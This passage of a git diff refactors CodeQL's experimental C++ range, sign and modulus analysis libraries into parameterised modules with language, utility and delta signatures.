mod) and isLeft = false ) - ) -} + } -private predicate condExprBranchModulus( - SemConditionalExpr cond, boolean branch, SemBound b, int val, int mod -) { - semExprModulus(cond.getBranchExpr(branch), b, val, mod) -} - -private predicate addModulus(SemExpr add, boolean isLeft, SemBound b, int val, int mod) { - exists(SemExpr larg, SemExpr rarg | nonConstAddition(add, larg, rarg) | - semExprModulus(larg, b, val, mod) and isLeft = true - or - semExprModulus(rarg, b, val, mod) and isLeft = false - ) -} - -private predicate subModulus(SemExpr sub, boolean isLeft, SemBound b, int val, int mod) { - exists(SemExpr larg, SemExpr rarg | nonConstSubtraction(sub, larg, rarg) | - semExprModulus(larg, b, val, mod) and isLeft = true - or - semExprModulus(rarg, b, val, mod) and isLeft = false - ) -} - -/** - * Holds if `inp` is an input to `phi` along `edge` and this input has index `r` - * in an arbitrary 1-based numbering of the input edges to `phi`. - */ -private predicate rankedPhiInput( - SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int r -) { - edge.phiInput(phi, inp) and - edge = - rank[r](SemSsaReadPositionPhiInputEdge e | - e.phiInput(phi, _) - | - e order by e.getOrigBlock().getUniqueId() + private predicate subModulus(SemExpr sub, boolean isLeft, SemBound b, int val, int mod) { + exists(SemExpr larg, SemExpr rarg | nonConstSubtraction(sub, larg, rarg) | + semExprModulus(larg, b, val, mod) and isLeft = true + or + semExprModulus(rarg, b, val, mod) and isLeft = false ) + } + + /** + * Holds if `inp` is an input to `phi` along `edge` and this input has index `r` + * in an arbitrary 1-based numbering of the input edges to `phi`. + */ + private predicate rankedPhiInput( + SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int r + ) { + edge.phiInput(phi, inp) and + edge = + rank[r](SemSsaReadPositionPhiInputEdge e | + e.phiInput(phi, _) + | + e order by e.getOrigBlock().getUniqueId() + ) + } } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll new file mode 100644 index 00000000000..6d7ba2e9ff1 --- /dev/null +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll @@ -0,0 +1,6 @@ +private import RangeAnalysisStage +private import RangeAnalysisSpecific +private import FloatDelta +private import RangeUtils + +module CppRangeAnalysis = RangeStage>; \ No newline at end of file diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll index 5918b56e50e..769538fc4cf 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll @@ -3,86 +3,90 @@ */ private import experimental.semmle.code.cpp.semantic.Semantic +private import RangeAnalysisStage +private import FloatDelta -/** - * Holds if the specified expression should be excluded from the result of `ssaRead()`. - * - * This predicate is to keep the results identical to the original Java implementation. It should be - * removed once we have the new implementation matching the old results exactly. - */ -predicate ignoreSsaReadCopy(SemExpr e) { none() } +module CppLangImpl implements LangSig { + /** + * Holds if the specified expression should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadCopy(SemExpr e) { none() } -/** - * Ignore the bound on this expression. - * - * This predicate is to keep the results identical to the original Java implementation. It should be - * removed once we have the new implementation matching the old results exactly. - */ -predicate ignoreExprBound(SemExpr e) { none() } + /** + * Ignore the bound on this expression. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreExprBound(SemExpr e) { none() } -/** - * Ignore any inferred zero lower bound on this expression. - * - * This predicate is to keep the results identical to the original Java implementation. It should be - * removed once we have the new implementation matching the old results exactly. - */ -predicate ignoreZeroLowerBound(SemExpr e) { none() } + /** + * Ignore any inferred zero lower bound on this expression. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreZeroLowerBound(SemExpr e) { none() } -/** - * Holds if the specified expression should be excluded from the result of `ssaRead()`. - * - * This predicate is to keep the results identical to the original Java implementation. It should be - * removed once we have the new implementation matching the old results exactly. - */ -predicate ignoreSsaReadArithmeticExpr(SemExpr e) { none() } + /** + * Holds if the specified expression should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadArithmeticExpr(SemExpr e) { none() } -/** - * Holds if the specified variable should be excluded from the result of `ssaRead()`. - * - * This predicate is to keep the results identical to the original Java implementation. It should be - * removed once we have the new implementation matching the old results exactly. - */ -predicate ignoreSsaReadAssignment(SemSsaVariable v) { none() } + /** + * Holds if the specified variable should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadAssignment(SemSsaVariable v) { none() } -/** - * Adds additional results to `ssaRead()` that are specific to Java. - * - * This predicate handles propagation of offsets for post-increment and post-decrement expressions - * in exactly the same way as the old Java implementation. Once the new implementation matches the - * old one, we should remove this predicate and propagate deltas for all similar patterns, whether - * or not they come from a post-increment/decrement expression. - */ -SemExpr specificSsaRead(SemSsaVariable v, int delta) { none() } + /** + * Adds additional results to `ssaRead()` that are specific to Java. + * + * This predicate handles propagation of offsets for post-increment and post-decrement expressions + * in exactly the same way as the old Java implementation. Once the new implementation matches the + * old one, we should remove this predicate and propagate deltas for all similar patterns, whether + * or not they come from a post-increment/decrement expression. + */ + SemExpr specificSsaRead(SemSsaVariable v, float delta) { none() } -/** - * Holds if `e >= bound` (if `upper = false`) or `e <= bound` (if `upper = true`). - */ -predicate hasConstantBound(SemExpr e, int bound, boolean upper) { none() } + /** + * Holds if `e >= bound` (if `upper = false`) or `e <= bound` (if `upper = true`). + */ + predicate hasConstantBound(SemExpr e, float bound, boolean upper) { none() } -/** - * Holds if `e >= bound + delta` (if `upper = false`) or `e <= bound + delta` (if `upper = true`). - */ -predicate hasBound(SemExpr e, SemExpr bound, int delta, boolean upper) { none() } + /** + * Holds if `e >= bound + delta` (if `upper = false`) or `e <= bound + delta` (if `upper = true`). + */ + predicate hasBound(SemExpr e, SemExpr bound, float delta, boolean upper) { none() } -/** - * Holds if the value of `dest` is known to be `src + delta`. - */ -predicate additionalValueFlowStep(SemExpr dest, SemExpr src, int delta) { none() } + /** + * Holds if the value of `dest` is known to be `src + delta`. + */ + predicate additionalValueFlowStep(SemExpr dest, SemExpr src, float delta) { none() } -/** - * Gets the type that range analysis should use to track the result of the specified expression, - * if a type other than the original type of the expression is to be used. - * - * This predicate is commonly used in languages that support immutable "boxed" types that are - * actually references but whose values can be tracked as the type contained in the box. - */ -SemType getAlternateType(SemExpr e) { none() } + /** + * Gets the type that range analysis should use to track the result of the specified expression, + * if a type other than the original type of the expression is to be used. + * + * This predicate is commonly used in languages that support immutable "boxed" types that are + * actually references but whose values can be tracked as the type contained in the box. + */ + SemType getAlternateType(SemExpr e) { none() } -/** - * Gets the type that range analysis should use to track the result of the specified source - * variable, if a type other than the original type of the expression is to be used. - * - * This predicate is commonly used in languages that support immutable "boxed" types that are - * actually references but whose values can be tracked as the type contained in the box. - */ -SemType getAlternateTypeForSsaVariable(SemSsaVariable var) { none() } + /** + * Gets the type that range analysis should use to track the result of the specified source + * variable, if a type other than the original type of the expression is to be used. + * + * This predicate is commonly used in languages that support immutable "boxed" types that are + * actually references but whose values can be tracked as the type contained in the box. + */ + SemType getAlternateTypeForSsaVariable(SemSsaVariable var) { none() } +} \ No newline at end of file diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 3e5d4ec853c..0da8dc570d4 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -69,29 +69,6 @@ private import ModulusAnalysis private import experimental.semmle.code.cpp.semantic.Semantic private import ConstantAnalysis -/** - * An expression that does conversion, boxing, or unboxing - */ -private class ConvertOrBoxExpr extends SemUnaryExpr { - ConvertOrBoxExpr() { - this instanceof SemConvertExpr - or - this instanceof SemBoxExpr - or - this instanceof SemUnboxExpr - } -} - -/** - * A cast that can be ignored for the purpose of range analysis. - */ -private class SafeCastExpr extends ConvertOrBoxExpr { - SafeCastExpr() { - conversionCannotOverflow(Utils::getTrackedType(pragma[only_bind_into](getOperand())), - Utils::getTrackedType(this)) - } -} - /** * Holds if `typ` is a small integral type with the given lower and upper bounds. */ @@ -111,54 +88,45 @@ private predicate typeBound(SemIntegerType typ, int lowerbound, int upperbound) ) } -/** - * A cast to a small integral type that may overflow or underflow. - */ -private class NarrowingCastExpr extends ConvertOrBoxExpr { - NarrowingCastExpr() { - not this instanceof SafeCastExpr and - typeBound(Utils::getTrackedType(this), _, _) - } - - /** Gets the lower bound of the resulting type. */ - int getLowerBound() { typeBound(Utils::getTrackedType(this), result, _) } - - /** Gets the upper bound of the resulting type. */ - int getUpperBound() { typeBound(Utils::getTrackedType(this), _, result) } -} - signature module DeltaSig { + bindingset[this] class Delta; + bindingset[d] + bindingset[result] float toFloat(Delta d); + bindingset[d] + bindingset[result] int toInt(Delta d); + bindingset[n] + bindingset[result] Delta fromInt(int n); + bindingset[f] + bindingset[result] Delta fromFloat(float f); } -signature module UtilSig { - SemExpr semSsaRead(SemSsaVariable v, DeltaParam::Delta delta); - - SemGuard semEqFlowCond( - SemSsaVariable v, SemExpr e, DeltaParam::Delta delta, boolean isEq, boolean testIsTrue - ); - - predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, DeltaParam::Delta delta); - - predicate semValueFlowStep(SemExpr e2, SemExpr e1, DeltaParam::Delta delta); +signature module LangSig { + /** + * Holds if the specified expression should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadCopy(SemExpr e); /** * Holds if `e >= bound` (if `upper = false`) or `e <= bound` (if `upper = true`). */ - predicate hasConstantBound(SemExpr e, int bound, boolean upper); + predicate hasConstantBound(SemExpr e, D::Delta bound, boolean upper); /** * Holds if `e >= bound + delta` (if `upper = false`) or `e <= bound + delta` (if `upper = true`). */ - predicate hasBound(SemExpr e, SemExpr bound, int delta, boolean upper); + predicate hasBound(SemExpr e, SemExpr bound, D::Delta delta, boolean upper); /** * Ignore the bound on this expression. @@ -175,9 +143,137 @@ signature module UtilSig { * removed once we have the new implementation matching the old results exactly. */ predicate ignoreZeroLowerBound(SemExpr e); + + /** + * Holds if the specified expression should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadArithmeticExpr(SemExpr e); + + /** + * Holds if the specified variable should be excluded from the result of `ssaRead()`. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreSsaReadAssignment(SemSsaVariable v); + + /** + * Adds additional results to `ssaRead()` that are specific to Java. + * + * This predicate handles propagation of offsets for post-increment and post-decrement expressions + * in exactly the same way as the old Java implementation. Once the new implementation matches the + * old one, we should remove this predicate and propagate deltas for all similar patterns, whether + * or not they come from a post-increment/decrement expression. + */ + SemExpr specificSsaRead(SemSsaVariable v, D::Delta delta); + + /** + * Holds if the value of `dest` is known to be `src + delta`. + */ + predicate additionalValueFlowStep(SemExpr dest, SemExpr src, D::Delta delta); + + /** + * Gets the type that range analysis should use to track the result of the specified expression, + * if a type other than the original type of the expression is to be used. + * + * This predicate is commonly used in languages that support immutable "boxed" types that are + * actually references but whose values can be tracked as the type contained in the box. + */ + SemType getAlternateType(SemExpr e); + + /** + * Gets the type that range analysis should use to track the result of the specified source + * variable, if a type other than the original type of the expression is to be used. + * + * This predicate is commonly used in languages that support immutable "boxed" types that are + * actually references but whose values can be tracked as the type contained in the box. + */ + SemType getAlternateTypeForSsaVariable(SemSsaVariable var); } -module RangeStage LangParam> { +signature module UtilSig { + SemExpr semSsaRead(SemSsaVariable v, DeltaParam::Delta delta); + + SemGuard semEqFlowCond( + SemSsaVariable v, SemExpr e, DeltaParam::Delta delta, boolean isEq, boolean testIsTrue + ); + + predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, DeltaParam::Delta delta); + + predicate semValueFlowStep(SemExpr e2, SemExpr e1, DeltaParam::Delta delta); + + /** + * Gets the type used to track the specified source variable's range information. + * + * Usually, this just `e.getType()`, but the language can override this to track immutable boxed + * primitive types as the underlying primitive type. + */ + SemType getTrackedTypeForSsaVariable(SemSsaVariable var); + + /** + * Gets the type used to track the specified expression's range information. + * + * Usually, this just `e.getSemType()`, but the language can override this to track immutable boxed + * primitive types as the underlying primitive type. + */ + SemType getTrackedType(SemExpr e); +} + +module RangeStage LangParam, UtilSig UtilParam> { + /** + * An expression that does conversion, boxing, or unboxing + */ + private class ConvertOrBoxExpr instanceof SemUnaryExpr { + ConvertOrBoxExpr() { + this instanceof SemConvertExpr + or + this instanceof SemBoxExpr + or + this instanceof SemUnboxExpr + } + + string toString() { result = super.toString() } + + SemExpr getOperand() { result = super.getOperand() } + } + + /** + * A cast that can be ignored for the purpose of range analysis. + */ + private class SafeCastExpr extends ConvertOrBoxExpr { + SafeCastExpr() { + conversionCannotOverflow(UtilParam::getTrackedType(pragma[only_bind_into](getOperand())), + UtilParam::getTrackedType(this)) + } + } + + /** + * A cast to a small integral type that may overflow or underflow. + */ + private class NarrowingCastExpr extends ConvertOrBoxExpr { + NarrowingCastExpr() { + not this instanceof SafeCastExpr and + typeBound(UtilParam::getTrackedType(this), _, _) + } + + /** Gets the lower bound of the resulting type. */ + int getLowerBound() { typeBound(UtilParam::getTrackedType(this), result, _) } + + /** Gets the upper bound of the resulting type. */ + int getUpperBound() { typeBound(UtilParam::getTrackedType(this), _, result) } + } + + private module SignAnalysisInstantiated = SignAnalysis; // TODO: will this cause reevaluation if it's instantiated with the same DeltaSig and UtilParam multiple times? + + private import SignAnalysisInstantiated + + private module ModulusAnalysisInstantiated = ModulusAnalysis; // TODO: will this cause reevaluation if it's instantiated with the same DeltaSig and UtilParam multiple times? + + private import ModulusAnalysisInstantiated + cached private module RangeAnalysisCache { cached @@ -203,7 +299,7 @@ module RangeStage LangParam> { */ cached predicate possibleReason(SemGuard guard) { - guard = boundFlowCond(_, _, _, _, _) or guard = LangParam::semEqFlowCond(_, _, _, _, _) + guard = boundFlowCond(_, _, _, _, _) or guard = UtilParam::semEqFlowCond(_, _, _, _, _) } } @@ -231,11 +327,11 @@ module RangeStage LangParam> { private predicate boundCondition( SemRelationalExpr comp, SemSsaVariable v, SemExpr e, float delta, boolean upper ) { - comp.getLesserOperand() = LangParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getLesserOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and e = comp.getGreaterOperand() and upper = true or - comp.getGreaterOperand() = LangParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getGreaterOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and e = comp.getLesserOperand() and upper = false or @@ -243,7 +339,7 @@ module RangeStage LangParam> { // (v - d) - e < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and - sub.getLeftOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = true and delta = d + c.getIntValue() @@ -251,7 +347,7 @@ module RangeStage LangParam> { // (v - d) - e > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and - sub.getLeftOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = false and delta = d + c.getIntValue() @@ -260,7 +356,7 @@ module RangeStage LangParam> { comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and upper = false and delta = d - c.getIntValue() or @@ -268,7 +364,7 @@ module RangeStage LangParam> { comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and upper = true and delta = d - c.getIntValue() ) @@ -338,8 +434,8 @@ module RangeStage LangParam> { ) and ( if - Utils::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or - Utils::getTrackedTypeForSsaVariable(v) instanceof SemAddressType + UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or + UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemAddressType then upper = true and strengthen = -1 or @@ -364,7 +460,7 @@ module RangeStage LangParam> { semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) ) or - result = LangParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and + result = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and (upper = true or upper = false) or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and @@ -373,7 +469,7 @@ module RangeStage LangParam> { SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta | guardEq = - LangParam::semEqFlowCond(v, LangParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), + UtilParam::semEqFlowCond(v, UtilParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), true, eqIsTrue) and result = boundFlowCond(v2, e, oldDelta, upper, testIsTrue) and // guardEq needs to control guard @@ -421,7 +517,7 @@ module RangeStage LangParam> { SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, boolean upper, SemReason reason ) { - LangParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and + UtilParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and pos.hasReadOfVar(v) and (upper = true or upper = false) and reason = TSemNoReason() @@ -438,10 +534,10 @@ module RangeStage LangParam> { private predicate unequalFlowStepIntegralSsa( SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, SemReason reason ) { - Utils::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and + UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and exists(SemGuard guard, boolean testIsTrue | pos.hasReadOfVar(v) and - guard = LangParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and + guard = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and reason = TSemCondReason(guard) ) @@ -449,12 +545,12 @@ module RangeStage LangParam> { /** Holds if `e >= 1` as determined by sign analysis. */ private predicate strictlyPositiveIntegralExpr(SemExpr e) { - semStrictlyPositive(e) and Utils::getTrackedType(e) instanceof SemIntegerType + semStrictlyPositive(e) and UtilParam::getTrackedType(e) instanceof SemIntegerType } /** Holds if `e <= -1` as determined by sign analysis. */ private predicate strictlyNegativeIntegralExpr(SemExpr e) { - semStrictlyNegative(e) and Utils::getTrackedType(e) instanceof SemIntegerType + semStrictlyNegative(e) and UtilParam::getTrackedType(e) instanceof SemIntegerType } /** @@ -463,7 +559,7 @@ module RangeStage LangParam> { * - `upper = false` : `e2 >= e1 + delta` */ private predicate boundFlowStep(SemExpr e2, SemExpr e1, float delta, boolean upper) { - LangParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and + UtilParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and (upper = true or upper = false) or e2.(SafeCastExpr).getOperand() = e1 and @@ -526,7 +622,7 @@ module RangeStage LangParam> { delta = 0 and upper = false or - LangParam::hasBound(e2, e1, delta, upper) + LangParam::hasBound(e2, e1, D::fromFloat(delta), upper) } /** Holds if `e2 = e1 * factor` and `factor > 0`. */ @@ -768,7 +864,7 @@ module RangeStage LangParam> { * (for `upper = false`) bound of `b`. */ private predicate baseBound(SemExpr e, float b, boolean upper) { - LangParam::hasConstantBound(e, b, upper) + LangParam::hasConstantBound(e, D::fromFloat(b), upper) or upper = false and b = 0 and diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll index 0bd7a407f1e..bc10fe156be 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll @@ -3,133 +3,136 @@ */ private import experimental.semmle.code.cpp.semantic.Semantic -private import RangeAnalysisSpecific as Specific +private import RangeAnalysisSpecific +private import RangeAnalysisStage as Range private import ConstantAnalysis -/** - * Gets an expression that equals `v - d`. - */ -SemExpr semSsaRead(SemSsaVariable v, int delta) { - // There are various language-specific extension points that can be removed once we no longer - // expect to match the original Java implementation's results exactly. - result = v.getAUse() and delta = 0 - or - exists(int d1, SemConstantIntegerExpr c | - result.(SemAddExpr).hasOperands(semSsaRead(v, d1), c) and - delta = d1 - c.getIntValue() and - not Specific::ignoreSsaReadArithmeticExpr(result) - ) - or - exists(SemSubExpr sub, int d1, SemConstantIntegerExpr c | - result = sub and - sub.getLeftOperand() = semSsaRead(v, d1) and - sub.getRightOperand() = c and - delta = d1 + c.getIntValue() and - not Specific::ignoreSsaReadArithmeticExpr(result) - ) - or - result = v.(SemSsaExplicitUpdate).getSourceExpr() and - delta = 0 and - not Specific::ignoreSsaReadAssignment(v) - or - result = Specific::specificSsaRead(v, delta) - or - result.(SemCopyValueExpr).getOperand() = semSsaRead(v, delta) and - not Specific::ignoreSsaReadCopy(result) - or - result.(SemStoreExpr).getOperand() = semSsaRead(v, delta) -} - -/** - * Gets a condition that tests whether `v` equals `e + delta`. - * - * If the condition evaluates to `testIsTrue`: - * - `isEq = true` : `v == e + delta` - * - `isEq = false` : `v != e + delta` - */ -SemGuard semEqFlowCond(SemSsaVariable v, SemExpr e, int delta, boolean isEq, boolean testIsTrue) { - exists(boolean eqpolarity | - result.isEquality(semSsaRead(v, delta), e, eqpolarity) and - (testIsTrue = true or testIsTrue = false) and - eqpolarity.booleanXor(testIsTrue).booleanNot() = isEq - ) - or - exists(boolean testIsTrue0 | - semImplies_v2(result, testIsTrue, semEqFlowCond(v, e, delta, isEq, testIsTrue0), testIsTrue0) - ) -} - -/** - * Holds if `v` is an `SsaExplicitUpdate` that equals `e + delta`. - */ -predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, int delta) { - exists(SemExpr defExpr | defExpr = v.getSourceExpr() | - defExpr.(SemCopyValueExpr).getOperand() = e and delta = 0 +module RangeUtil Lang> implements Range::UtilSig { + /** + * Gets an expression that equals `v - d`. + */ + SemExpr semSsaRead(SemSsaVariable v, D::Delta delta) { + // There are various language-specific extension points that can be removed once we no longer + // expect to match the original Java implementation's results exactly. + result = v.getAUse() and delta = D::fromInt(0) or - defExpr.(SemStoreExpr).getOperand() = e and delta = 0 + exists(D::Delta d1, SemConstantIntegerExpr c | + result.(SemAddExpr).hasOperands(semSsaRead(v, d1), c) and + delta = D::fromFloat(D::toFloat(d1) - c.getIntValue()) and + not Lang::ignoreSsaReadArithmeticExpr(result) + ) or - defExpr.(SemAddOneExpr).getOperand() = e and delta = 1 + exists(SemSubExpr sub, float d1, SemConstantIntegerExpr c | + result = sub and + sub.getLeftOperand() = semSsaRead(v, D::fromFloat(d1)) and + sub.getRightOperand() = c and + delta = D::fromFloat(d1 + c.getIntValue()) and + not Lang::ignoreSsaReadArithmeticExpr(result) + ) or - defExpr.(SemSubOneExpr).getOperand() = e and delta = -1 + result = v.(SemSsaExplicitUpdate).getSourceExpr() and + delta = D::fromFloat(0) and + not Lang::ignoreSsaReadAssignment(v) or - e = defExpr and - not ( - defExpr instanceof SemCopyValueExpr or - defExpr instanceof SemStoreExpr or - defExpr instanceof SemAddOneExpr or - defExpr instanceof SemSubOneExpr - ) and - delta = 0 - ) -} + result = Lang::specificSsaRead(v, delta) + or + result.(SemCopyValueExpr).getOperand() = semSsaRead(v, delta) and + not Lang::ignoreSsaReadCopy(result) + or + result.(SemStoreExpr).getOperand() = semSsaRead(v, delta) + } -/** - * Holds if `e1 + delta` equals `e2`. - */ -predicate semValueFlowStep(SemExpr e2, SemExpr e1, int delta) { - e2.(SemCopyValueExpr).getOperand() = e1 and delta = 0 - or - e2.(SemStoreExpr).getOperand() = e1 and delta = 0 - or - e2.(SemAddOneExpr).getOperand() = e1 and delta = 1 - or - e2.(SemSubOneExpr).getOperand() = e1 and delta = -1 - or - Specific::additionalValueFlowStep(e2, e1, delta) - or - exists(SemExpr x | e2.(SemAddExpr).hasOperands(e1, x) | - x.(SemConstantIntegerExpr).getIntValue() = delta - ) - or - exists(SemExpr x, SemSubExpr sub | - e2 = sub and - sub.getLeftOperand() = e1 and - sub.getRightOperand() = x - | - x.(SemConstantIntegerExpr).getIntValue() = -delta - ) -} + /** + * Gets a condition that tests whether `v` equals `e + delta`. + * + * If the condition evaluates to `testIsTrue`: + * - `isEq = true` : `v == e + delta` + * - `isEq = false` : `v != e + delta` + */ + SemGuard semEqFlowCond(SemSsaVariable v, SemExpr e, D::Delta delta, boolean isEq, boolean testIsTrue) { + exists(boolean eqpolarity | + result.isEquality(semSsaRead(v, delta), e, eqpolarity) and + (testIsTrue = true or testIsTrue = false) and + eqpolarity.booleanXor(testIsTrue).booleanNot() = isEq + ) + or + exists(boolean testIsTrue0 | + semImplies_v2(result, testIsTrue, semEqFlowCond(v, e, delta, isEq, testIsTrue0), testIsTrue0) + ) + } -/** - * Gets the type used to track the specified expression's range information. - * - * Usually, this just `e.getSemType()`, but the language can override this to track immutable boxed - * primitive types as the underlying primitive type. - */ -SemType getTrackedType(SemExpr e) { - result = Specific::getAlternateType(e) - or - not exists(Specific::getAlternateType(e)) and result = e.getSemType() -} + /** + * Holds if `v` is an `SsaExplicitUpdate` that equals `e + delta`. + */ + predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, D::Delta delta) { + exists(SemExpr defExpr | defExpr = v.getSourceExpr() | + defExpr.(SemCopyValueExpr).getOperand() = e and delta = D::fromFloat(0) + or + defExpr.(SemStoreExpr).getOperand() = e and delta = D::fromFloat(0) + or + defExpr.(SemAddOneExpr).getOperand() = e and delta = D::fromFloat(1) + or + defExpr.(SemSubOneExpr).getOperand() = e and delta = D::fromFloat(-1) + or + e = defExpr and + not ( + defExpr instanceof SemCopyValueExpr or + defExpr instanceof SemStoreExpr or + defExpr instanceof SemAddOneExpr or + defExpr instanceof SemSubOneExpr + ) and + delta = D::fromFloat(0) + ) + } -/** - * Gets the type used to track the specified source variable's range information. - * - * Usually, this just `e.getType()`, but the language can override this to track immutable boxed - * primitive types as the underlying primitive type. - */ -SemType getTrackedTypeForSsaVariable(SemSsaVariable var) { - result = Specific::getAlternateTypeForSsaVariable(var) - or - not exists(Specific::getAlternateTypeForSsaVariable(var)) and result = var.getType() + /** + * Holds if `e1 + delta` equals `e2`. + */ + predicate semValueFlowStep(SemExpr e2, SemExpr e1, D::Delta delta) { + e2.(SemCopyValueExpr).getOperand() = e1 and delta = D::fromFloat(0) + or + e2.(SemStoreExpr).getOperand() = e1 and delta = D::fromFloat(0) + or + e2.(SemAddOneExpr).getOperand() = e1 and delta = D::fromFloat(1) + or + e2.(SemSubOneExpr).getOperand() = e1 and delta = D::fromFloat(-1) + or + Lang::additionalValueFlowStep(e2, e1, delta) + or + exists(SemExpr x | e2.(SemAddExpr).hasOperands(e1, x) | + D::fromInt(x.(SemConstantIntegerExpr).getIntValue()) = delta + ) + or + exists(SemExpr x, SemSubExpr sub | + e2 = sub and + sub.getLeftOperand() = e1 and + sub.getRightOperand() = x + | + D::fromInt(-x.(SemConstantIntegerExpr).getIntValue()) = delta + ) + } + + /** + * Gets the type used to track the specified expression's range information. + * + * Usually, this just `e.getSemType()`, but the language can override this to track immutable boxed + * primitive types as the underlying primitive type. + */ + SemType getTrackedType(SemExpr e) { + result = Lang::getAlternateType(e) + or + not exists(Lang::getAlternateType(e)) and result = e.getSemType() + } + + /** + * Gets the type used to track the specified source variable's range information. + * + * Usually, this just `e.getType()`, but the language can override this to track immutable boxed + * primitive types as the underlying primitive type. + */ + SemType getTrackedTypeForSsaVariable(SemSsaVariable var) { + result = Lang::getAlternateTypeForSsaVariable(var) + or + not exists(Lang::getAlternateTypeForSsaVariable(var)) and result = var.getType() + } } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/SignAnalysisCommon.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/SignAnalysisCommon.qll index 970a6c4e5a9..94ef40e83fa 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/SignAnalysisCommon.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/SignAnalysisCommon.qll @@ -6,488 +6,494 @@ * three-valued domain `{negative, zero, positive}`. */ +private import RangeAnalysisStage private import SignAnalysisSpecific as Specific private import experimental.semmle.code.cpp.semantic.Semantic private import ConstantAnalysis private import 